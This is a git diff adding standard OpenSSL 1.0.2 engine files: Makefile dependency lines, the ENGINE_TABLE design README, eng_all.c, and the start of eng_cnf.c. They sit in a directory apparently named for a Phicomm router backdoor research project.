+eng_table.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_table.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_table.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h
+eng_table.o: eng_table.c
+tb_asnmth.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_asnmth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_asnmth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_asnmth.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_asnmth.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_asnmth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_asnmth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_asnmth.o: ../../include/openssl/objects.h
+tb_asnmth.o: ../../include/openssl/opensslconf.h
+tb_asnmth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_asnmth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_asnmth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_asnmth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_asnmth.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+tb_asnmth.o: eng_int.h tb_asnmth.c
+tb_cipher.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_cipher.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_cipher.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_cipher.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_cipher.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_cipher.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_cipher.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_cipher.o: ../../include/openssl/objects.h
+tb_cipher.o: ../../include/openssl/opensslconf.h
+tb_cipher.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_cipher.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_cipher.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_cipher.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_cipher.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h
+tb_cipher.o: tb_cipher.c
+tb_dh.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+tb_dh.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+tb_dh.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+tb_dh.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+tb_dh.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+tb_dh.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+tb_dh.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+tb_dh.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+tb_dh.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+tb_dh.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+tb_dh.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+tb_dh.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+tb_dh.o: ../cryptlib.h eng_int.h tb_dh.c
+tb_digest.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_digest.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_digest.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_digest.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_digest.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_digest.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_digest.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_digest.o: ../../include/openssl/objects.h
+tb_digest.o: ../../include/openssl/opensslconf.h
+tb_digest.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_digest.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_digest.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_digest.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_digest.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h
+tb_digest.o: tb_digest.c
+tb_dsa.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+tb_dsa.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+tb_dsa.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+tb_dsa.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+tb_dsa.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+tb_dsa.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+tb_dsa.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+tb_dsa.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+tb_dsa.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+tb_dsa.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+tb_dsa.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+tb_dsa.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+tb_dsa.o: ../cryptlib.h eng_int.h tb_dsa.c
+tb_ecdh.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_ecdh.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_ecdh.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_ecdh.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_ecdh.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_ecdh.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_ecdh.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_ecdh.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tb_ecdh.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_ecdh.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_ecdh.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_ecdh.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_ecdh.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h tb_ecdh.c
+tb_ecdsa.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_ecdsa.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_ecdsa.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_ecdsa.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_ecdsa.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_ecdsa.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_ecdsa.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_ecdsa.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tb_ecdsa.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_ecdsa.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_ecdsa.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_ecdsa.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_ecdsa.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h tb_ecdsa.c
+tb_pkmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_pkmeth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_pkmeth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_pkmeth.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_pkmeth.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_pkmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_pkmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_pkmeth.o: ../../include/openssl/objects.h
+tb_pkmeth.o: ../../include/openssl/opensslconf.h
+tb_pkmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_pkmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_pkmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_pkmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_pkmeth.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h
+tb_pkmeth.o: tb_pkmeth.c
+tb_rand.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_rand.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_rand.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_rand.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_rand.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_rand.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_rand.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_rand.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tb_rand.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_rand.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_rand.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_rand.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_rand.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h tb_rand.c
+tb_rsa.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+tb_rsa.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+tb_rsa.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+tb_rsa.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+tb_rsa.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+tb_rsa.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+tb_rsa.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+tb_rsa.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+tb_rsa.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+tb_rsa.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+tb_rsa.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+tb_rsa.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+tb_rsa.o: ../cryptlib.h eng_int.h tb_rsa.c
+tb_store.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_store.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_store.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_store.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_store.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_store.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_store.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_store.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tb_store.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_store.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_store.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_store.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_store.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h tb_store.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/README
new file mode 100644
index 0000000..6b69b70
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/README
@@ -0,0 +1,211 @@
+Notes: 2001-09-24
+-----------------
+
+This "description" (if one chooses to call it that) needed some major updating
+so here goes. This update addresses a change being made at the same time to
+OpenSSL, and it pretty much completely restructures the underlying mechanics of
+the "ENGINE" code. So it serves a double purpose of being a "ENGINE internals
+for masochists" document *and* a rather extensive commit log message. (I'd get
+lynched for sticking all this in CHANGES or the commit mails :-).
+
+ENGINE_TABLE underlies this restructuring, as described in the internal header
+"eng_int.h", implemented in eng_table.c, and used in each of the "class" files;
+tb_rsa.c, tb_dsa.c, etc.
+
+However, "EVP_CIPHER" underlies the motivation and design of ENGINE_TABLE so
+I'll mention a bit about that first. EVP_CIPHER (and most of this applies
+equally to EVP_MD for digests) is both a "method" and a algorithm/mode
+identifier that, in the current API, "lingers". These cipher description +
+implementation structures can be defined or obtained directly by applications,
+or can be loaded "en masse" into EVP storage so that they can be catalogued and
+searched in various ways, ie. two ways of encrypting with the "des_cbc"
+algorithm/mode pair are;
+
+(i) directly;
+     const EVP_CIPHER *cipher = EVP_des_cbc();
+     EVP_EncryptInit(&ctx, cipher, key, iv);
+     [ ... use EVP_EncryptUpdate() and EVP_EncryptFinal() ...]
+
+(ii) indirectly; 
+     OpenSSL_add_all_ciphers();
+     cipher = EVP_get_cipherbyname("des_cbc");
+     EVP_EncryptInit(&ctx, cipher, key, iv);
+     [ ... etc ... ]
+
+The latter is more generally used because it also allows ciphers/digests to be
+looked up based on other identifiers which can be useful for automatic cipher
+selection, eg. in SSL/TLS, or by user-controllable configuration.
+
+The important point about this is that EVP_CIPHER definitions and structures are
+passed around with impunity and there is no safe way, without requiring massive
+rewrites of many applications, to assume that EVP_CIPHERs can be reference
+counted. One an EVP_CIPHER is exposed to the caller, neither it nor anything it
+comes from can "safely" be destroyed. Unless of course the way of getting to
+such ciphers is via entirely distinct API calls that didn't exist before.
+However existing API usage cannot be made to understand when an EVP_CIPHER
+pointer, that has been passed to the caller, is no longer being used.
+
+The other problem with the existing API w.r.t. to hooking EVP_CIPHER support
+into ENGINE is storage - the OBJ_NAME-based storage used by EVP to register
+ciphers simultaneously registers cipher *types* and cipher *implementations* -
+they are effectively the same thing, an "EVP_CIPHER" pointer. The problem with
+hooking in ENGINEs is that multiple ENGINEs may implement the same ciphers. The
+solution is necessarily that ENGINE-provided ciphers simply are not registered,
+stored, or exposed to the caller in the same manner as existing ciphers. This is
+especially necessary considering the fact ENGINE uses reference counts to allow
+for cleanup, modularity, and DSO support - yet EVP_CIPHERs, as exposed to
+callers in the current API, support no such controls.
+
+Another sticking point for integrating cipher support into ENGINE is linkage.
+Already there is a problem with the way ENGINE supports RSA, DSA, etc whereby
+they are available *because* they're part of a giant ENGINE called "openssl".
+Ie. all implementations *have* to come from an ENGINE, but we get round that by
+having a giant ENGINE with all the software support encapsulated. This creates
+linker hassles if nothing else - linking a 1-line application that calls 2 basic
+RSA functions (eg. "RSA_free(RSA_new());") will result in large quantities of
+ENGINE code being linked in *and* because of that DSA, DH, and RAND also. If we
+continue with this approach for EVP_CIPHER support (even if it *was* possible)
+we would lose our ability to link selectively by selectively loading certain
+implementations of certain functionality. Touching any part of any kind of
+crypto would result in massive static linkage of everything else. So the
+solution is to change the way ENGINE feeds existing "classes", ie. how the
+hooking to ENGINE works from RSA, DSA, DH, RAND, as well as adding new hooking
+for EVP_CIPHER, and EVP_MD.
+
+The way this is now being done is by mostly reverting back to how things used to
+work prior to ENGINE :-). Ie. RSA now has a "RSA_METHOD" pointer again - this
+was previously replaced by an "ENGINE" pointer and all RSA code that required
+the RSA_METHOD would call ENGINE_get_RSA() each time on its ENGINE handle to
+temporarily get and use the ENGINE's RSA implementation. Apart from being more
+efficient, switching back to each RSA having an RSA_METHOD pointer also allows
+us to conceivably operate with *no* ENGINE. As we'll see, this removes any need
+for a fallback ENGINE that encapsulates default implementations - we can simply
+have our RSA structure pointing its RSA_METHOD pointer to the software
+implementation and have its ENGINE pointer set to NULL.
+
+A look at the EVP_CIPHER hooking is most explanatory, the RSA, DSA (etc) cases
+turn out to be degenerate forms of the same thing. The EVP storage of ciphers,
+and the existing EVP API functions that return "software" implementations and
+descriptions remain untouched. However, the storage takes more meaning in terms
+of "cipher description" and less meaning in terms of "implementation". When an
+EVP_CIPHER_CTX is actually initialised with an EVP_CIPHER method and is about to
+begin en/decryption, the hooking to ENGINE comes into play. What happens is that
+cipher-specific ENGINE code is asked for an ENGINE pointer (a functional
+reference) for any ENGINE that is registered to perform the algo/mode that the
+provided EVP_CIPHER structure represents. Under normal circumstances, that
+ENGINE code will return NULL because no ENGINEs will have had any cipher
+implementations *registered*. As such, a NULL ENGINE pointer is stored in the
+EVP_CIPHER_CTX context, and the EVP_CIPHER structure is left hooked into the
+context and so is used as the implementation. Pretty much how things work now
+except we'd have a redundant ENGINE pointer set to NULL and doing nothing.
+
+Conversely, if an ENGINE *has* been registered to perform the algorithm/mode
+combination represented by the provided EVP_CIPHER, then a functional reference
+to that ENGINE will be returned to the EVP_CIPHER_CTX during initialisation.
+That functional reference will be stored in the context (and released on
+cleanup) - and having that reference provides a *safe* way to use an EVP_CIPHER
+definition that is private to the ENGINE. Ie. the EVP_CIPHER provided by the
+application will actually be replaced by an EVP_CIPHER from the registered
+ENGINE - it will support the same algorithm/mode as the original but will be a
+completely different implementation. Because this EVP_CIPHER isn't stored in the
+EVP storage, nor is it returned to applications from traditional API functions,
+there is no associated problem with it not having reference counts. And of
+course, when one of these "private" cipher implementations is hooked into
+EVP_CIPHER_CTX, it is done whilst the EVP_CIPHER_CTX holds a functional
+reference to the ENGINE that owns it, thus the use of the ENGINE's EVP_CIPHER is
+safe.
+
+The "cipher-specific ENGINE code" I mentioned is implemented in tb_cipher.c but
+in essence it is simply an instantiation of "ENGINE_TABLE" code for use by
+EVP_CIPHER code. tb_digest.c is virtually identical but, of course, it is for
+use by EVP_MD code. Ditto for tb_rsa.c, tb_dsa.c, etc. These instantiations of
+ENGINE_TABLE essentially provide linker-separation of the classes so that even
+if ENGINEs implement *all* possible algorithms, an application using only
+EVP_CIPHER code will link at most code relating to EVP_CIPHER, tb_cipher.c, core
+ENGINE code that is independant of class, and of course the ENGINE
+implementation that the application loaded. It will *not* however link any
+class-specific ENGINE code for digests, RSA, etc nor will it bleed over into
+other APIs, such as the RSA/DSA/etc library code.
+
+ENGINE_TABLE is a little more complicated than may seem necessary but this is
+mostly to avoid a lot of "init()"-thrashing on ENGINEs (that may have to load
+DSOs, and other expensive setup that shouldn't be thrashed unnecessarily) *and*
+to duplicate "default" behaviour. Basically an ENGINE_TABLE instantiation, for
+example tb_cipher.c, implements a hash-table keyed by integer "nid" values.
+These nids provide the uniquenness of an algorithm/mode - and each nid will hash
+to a potentially NULL "ENGINE_PILE". An ENGINE_PILE is essentially a list of
+pointers to ENGINEs that implement that particular 'nid'. Each "pile" uses some
+caching tricks such that requests on that 'nid' will be cached and all future
+requests will return immediately (well, at least with minimal operation) unless
+a change is made to the pile, eg. perhaps an ENGINE was unloaded. The reason is
+that an application could have support for 10 ENGINEs statically linked
+in, and the machine in question may not have any of the hardware those 10
+ENGINEs support. If each of those ENGINEs has a "des_cbc" implementation, we
+want to avoid every EVP_CIPHER_CTX setup from trying (and failing) to initialise
+each of those 10 ENGINEs. Instead, the first such request will try to do that
+and will either return (and cache) a NULL ENGINE pointer or will return a
+functional reference to the first that successfully initialised. In the latter
+case it will also cache an extra functional reference to the ENGINE as a
+"default" for that 'nid'. The caching is acknowledged by a 'uptodate' variable
+that is unset only if un/registration takes place on that pile. Ie. if
+implementations of "des_cbc" are added or removed. This behaviour can be
+tweaked; the ENGINE_TABLE_FLAG_NOINIT value can be passed to
+ENGINE_set_table_flags(), in which case the only ENGINEs that tb_cipher.c will
+try to initialise from the "pile" will be those that are already initialised
+(ie. it's simply an increment of the functional reference count, and no real
+"initialisation" will take place).
+
+RSA, DSA, DH, and RAND all have their own ENGINE_TABLE code as well, and the
+difference is that they all use an implicit 'nid' of 1. Whereas EVP_CIPHERs are
+actually qualitatively different depending on 'nid' (the "des_cbc" EVP_CIPHER is
+not an interoperable implementation of "aes_256_cbc"), RSA_METHODs are
+necessarily interoperable and don't have different flavours, only different
+implementations. In other words, the ENGINE_TABLE for RSA will either be empty,
+or will have a single ENGING_PILE hashed to by the 'nid' 1 and that pile
+represents ENGINEs that implement the single "type" of RSA there is.
+
+Cleanup - the registration and unregistration may pose questions about how
+cleanup works with the ENGINE_PILE doing all this caching nonsense (ie. when the
+application or EVP_CIPHER code releases its last reference to an ENGINE, the
+ENGINE_PILE code may still have references and thus those ENGINEs will stay
+hooked in forever). The way this is handled is via "unregistration". With these
+new ENGINE changes, an abstract ENGINE can be loaded and initialised, but that
+is an algorithm-agnostic process. Even if initialised, it will not have
+registered any of its implementations (to do so would link all class "table"
+code despite the fact the application may use only ciphers, for example). This
+is deliberately a distinct step. Moreover, registration and unregistration has
+nothing to do with whether an ENGINE is *functional* or not (ie. you can even
+register an ENGINE and its implementations without it being operational, you may
+not even have the drivers to make it operate). What actually happens with
+respect to cleanup is managed inside eng_lib.c with the "engine_cleanup_***"
+functions. These functions are internal-only and each part of ENGINE code that
+could require cleanup will, upon performing its first allocation, register a
+callback with the "engine_cleanup" code. The other part of this that makes it
+tick is that the ENGINE_TABLE instantiations (tb_***.c) use NULL as their
+initialised state. So if RSA code asks for an ENGINE and no ENGINE has
+registered an implementation, the code will simply return NULL and the tb_rsa.c
+state will be unchanged. Thus, no cleanup is required unless registration takes
+place. ENGINE_cleanup() will simply iterate across a list of registered cleanup
+callbacks calling each in turn, and will then internally delete its own storage
+(a STACK). When a cleanup callback is next registered (eg. if the cleanup() is
+part of a gracefull restart and the application wants to cleanup all state then
+start again), the internal STACK storage will be freshly allocated. This is much
+the same as the situation in the ENGINE_TABLE instantiations ... NULL is the
+initialised state, so only modification operations (not queries) will cause that
+code to have to register a cleanup.
+
+What else? The bignum callbacks and associated ENGINE functions have been
+removed for two obvious reasons; (i) there was no way to generalise them to the
+mechanism now used by RSA/DSA/..., because there's no such thing as a BIGNUM
+method, and (ii) because of (i), there was no meaningful way for library or
+application code to automatically hook and use ENGINE supplied bignum functions
+anyway. Also, ENGINE_cpy() has been removed (although an internal-only version
+exists) - the idea of providing an ENGINE_cpy() function probably wasn't a good
+one and now certainly doesn't make sense in any generalised way. Some of the
+RSA, DSA, DH, and RAND functions that were fiddled during the original ENGINE
+changes have now, as a consequence, been reverted back. This is because the
+hooking of ENGINE is now automatic (and passive, it can interally use a NULL
+ENGINE pointer to simply ignore ENGINE from then on).
+
+Hell, that should be enough for now ... comments welcome: geoff@openssl.org
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_all.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_all.c
new file mode 100644
index 0000000..195a3a9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_all.c
@@ -0,0 +1,136 @@
+/* crypto/engine/eng_all.c -*- mode: C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte <richard@levitte.org> for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include "eng_int.h"
+
+void ENGINE_load_builtin_engines(void)
+{
+    /* Some ENGINEs need this */
+    OPENSSL_cpuid_setup();
+#if 0
+    /*
+     * There's no longer any need for an "openssl" ENGINE unless, one day, it
+     * is the *only* way for standard builtin implementations to be be
+     * accessed (ie. it would be possible to statically link binaries with
+     * *no* builtin implementations).
+     */
+    ENGINE_load_openssl();
+#endif
+#if !defined(OPENSSL_NO_HW) && (defined(__OpenBSD__) || defined(__FreeBSD__) || defined(HAVE_CRYPTODEV))
+    ENGINE_load_cryptodev();
+#endif
+#ifndef OPENSSL_NO_RDRAND
+    ENGINE_load_rdrand();
+#endif
+    ENGINE_load_dynamic();
+#ifndef OPENSSL_NO_STATIC_ENGINE
+# ifndef OPENSSL_NO_HW
+#  ifndef OPENSSL_NO_HW_4758_CCA
+    ENGINE_load_4758cca();
+#  endif
+#  ifndef OPENSSL_NO_HW_AEP
+    ENGINE_load_aep();
+#  endif
+#  ifndef OPENSSL_NO_HW_ATALLA
+    ENGINE_load_atalla();
+#  endif
+#  ifndef OPENSSL_NO_HW_CSWIFT
+    ENGINE_load_cswift();
+#  endif
+#  ifndef OPENSSL_NO_HW_NCIPHER
+    ENGINE_load_chil();
+#  endif
+#  ifndef OPENSSL_NO_HW_NURON
+    ENGINE_load_nuron();
+#  endif
+#  ifndef OPENSSL_NO_HW_SUREWARE
+    ENGINE_load_sureware();
+#  endif
+#  ifndef OPENSSL_NO_HW_UBSEC
+    ENGINE_load_ubsec();
+#  endif
+#  ifndef OPENSSL_NO_HW_PADLOCK
+    ENGINE_load_padlock();
+#  endif
+# endif
+# ifndef OPENSSL_NO_GOST
+    ENGINE_load_gost();
+# endif
+# ifndef OPENSSL_NO_GMP
+    ENGINE_load_gmp();
+# endif
+# if defined(OPENSSL_SYS_WIN32) && !defined(OPENSSL_NO_CAPIENG)
+    ENGINE_load_capi();
+# endif
+#endif
+    ENGINE_register_all_complete();
+}
+
+#if defined(__OpenBSD__) || defined(__FreeBSD__) || defined(HAVE_CRYPTODEV)
+void ENGINE_setup_bsd_cryptodev(void)
+{
+    static int bsd_cryptodev_default_loaded = 0;
+    if (!bsd_cryptodev_default_loaded) {
+        ENGINE_load_cryptodev();
+        ENGINE_register_all_complete();
+    }
+    bsd_cryptodev_default_loaded = 1;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_cnf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_cnf.c
new file mode 100644
index 0000000..f09bec4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_cnf.c
@@ -0,0 +1,242 @@
+/* eng_cnf.c */
+/*
+ * Written by Stephen Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
